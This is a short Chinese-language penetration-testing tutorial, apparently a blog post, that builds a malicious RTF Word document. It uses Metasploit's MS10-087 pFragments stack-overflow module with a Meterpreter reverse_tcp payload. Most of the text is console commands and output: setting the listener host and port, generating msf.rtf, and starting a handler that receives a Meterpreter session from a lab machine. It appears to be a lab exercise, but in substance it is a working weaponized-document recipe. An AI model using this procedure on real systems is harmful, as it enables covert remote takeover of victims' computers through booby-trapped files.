上一篇提到了使用恶意PDF对目标主机进行渗透测试,这次简单提一下使用word文件进行渗透攻击,没看过上一篇的可以看一下,了解下基本步骤
使用恶意PDF进行渗透测试
测试用例 | 描述 |
---|---|
漏洞 | microsoft word中的RTF分析器中的pFragments属性容易受到栈缓存区溢出攻击 |
受影响的系统 | Microsoft Office XP SP,2003 SP3,2007 SP2,2010 x32,2010 x64,Microsoft Office for Mac 2011 |
生成恶意word文档
msf6 > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
omsf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > options
Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.rtf yes The file name.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
**DisablePayloadHandler: True (no handler will be created!)**
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit
[*] Creating 'msf.rtf' file ...
[+] msf.rtf stored at /root/.msf4/local/msf.rtf
加载handler
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 2 opened (192.168.1.113:4444 -> 192.168.1.115:1885) at 2021-05-13 11:37:26 +0800
meterpreter >